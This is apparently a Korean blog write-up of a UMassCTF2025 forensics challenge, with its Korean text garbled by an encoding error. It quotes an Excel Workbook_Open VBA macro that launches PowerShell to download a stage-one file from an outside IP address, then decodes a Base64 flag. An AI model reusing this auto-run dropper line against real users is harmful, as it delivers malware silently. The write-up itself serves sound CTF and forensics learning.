π‘οΈ UMassCTF2025
UMass Amhers(λ§€μ¬μΆμΈμΈ λνκ΅ μ λ¨Έμ€νΈ μΊ νΌμ€)μ 2025λ CTFμ΄λ€.
λνκ° λλ νμ Write-Up μμ±μ΄ νμ©λλ€.
π λ¬Έμ
ν νμλ νλμ κ²μ μ€νλμ€μ μμΉ΄μ΄λΈμμ μμ¬μ€λ¬μ΄ μ€νλ λμνΈκ° λ°κ²¬λμμ΅λλ€.
μ΄μλ§μ λκ°κ° μ€νλμμ§λ§, μ§κΈμ κ·Έ 무μλ λ¨μ μμ§ μμ΅λλ€.
λΉμ μ μ무: λ§€ν¬λ‘λ₯Ό 리λ²μ±νκ³ , κ·Έκ²μ΄ μ΄λ€ μΌμ νλμ§ λΆμνμ¬, μμ νλ € νλ νλκ·Έλ₯Ό 볡ꡬνμΈμ.
βοΈ Write-Up
zip νμΌμλ λ€μκ³Ό κ°μ νμΌμ΄ λ€μ΄μλ€.
`dropper.xlsm`μ μ€ννλλ λ§€ν¬λ‘κ° μ€νλμκ³ , ν΄λΉ λ§€ν¬λ‘κ° μ μ± νμλ₯Ό μννλ€λ κ²μ μΆλ‘ ν μ μλ€.
ν΄λΉ μμ νμΌ μμ λ§€ν¬λ‘λ λλ‘νΌ μ μ± μ½λλ‘ μ¬μ©λμμ κ²μ μμΈ‘ν μ μλ€.
`flash.evtx`λ ν΄λΉ λ§€ν¬λ‘λ₯Ό μ€ννμ λ λ°μν μμ€ν μ΄λ²€νΈ νμΌμ΄λ€.
λ¨Όμ , λ§€ν¬λ‘ μ½λλ₯Ό λΆμνκΈ° μν΄ olevbaλΌλ ν΄μ μ΄μ©νμλ€.
https://github.com/decalage2/oletools/wiki/olevba
olevba
oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging. - decalage2/oletools
github.com
olevbaλ‘ vba μ½λλ₯Ό μΆμΆνλ©΄ λ€μκ³Ό κ°μ κ²°κ³Ό κ°μ μ»μ μ μλ€.
μΆμΆλ μ½λλ λ€μκ³Ό κ°λ€.
Private Sub Workbook_Open()
Dim cmd As String
cmd = "powershell.exe -Command ""Invoke-WebRequest -Uri 'http://34.138.121.94:8000/stage1.txt' -OutFile $env:TEMP\stage1.txt"""
Shell cmd
End Sub
` http://34.138.121.94:8000/stage1.txt` μΌλ‘ μΉν μμ²μ λ λ € κ²°κ΄κ°μ `$env:TEMP\stage1.txt` μ μ μ₯νκ³ μλ κ²μ νμΈ ν μ μλ€.
κ·Έλ¦¬κ³ ν΄λΉ νμΌμ μ€ννλ μ½λμ΄λ€.
κ·ΈλΌ μ΄μ ν΄λΉ νμΌμ΄ μ΄λ€ νμλ₯Ό μννλμ§ `flash.evtx`λ₯Ό μ΄μ΄μ νμΈν΄ 보μ.
μ΄λ²€νΈκ° 89κ° μ‘΄μ¬νμκ³ , μκ° κΈ°μ€μΌλ‘ μ λ ¬νμ¬ νλμ© μ΄ν΄λ³΄μλ€.
λ€μ μ΄λ²€νΈκ° λμ λμλ€. λ³μλ₯Ό μ€μ ν΄ μ£Όλ μ½λμλ€.
μ΄ μΈμλ λ€μκ³Ό κ°μ΄ 무μμ λ¬Έμμ΄μ μμ±ν μ½λμ κ·Έ μ½λμ μ€ν κ²°κ³Όλ§ μμλ€.
λ°λΌμ μμ¬λλ λ¬Έμμ΄μΈ `VU1BU1N7ZHJvcF9pdF9saWtlX2l0c19ob3R9`μ Base64λ‘ λμ½λ©ν΄λ³΄μλ€.
μ΄λ‘μ¨ νλκ·Έλ₯Ό νλν μ μμλ€.
π© νλκ·Έ
UMASS{drop_it_like_its_hot}
'CTF' μΉ΄ν κ³ λ¦¬μ λ€λ₯Έ κΈ
[UMassCTF2025] forensic_No Updates (0) | 2025.04.21 |
---|---|
picoCTF 2021 | information (0) | 2022.06.22 |
picoCTF 2021 | Mod 26 (0) | 2022.06.22 |
picoCTF 2021 | Wave a flag (0) | 2022.06.22 |
picoCTF 2021 | Obedient Cat (0) | 2022.06.22 |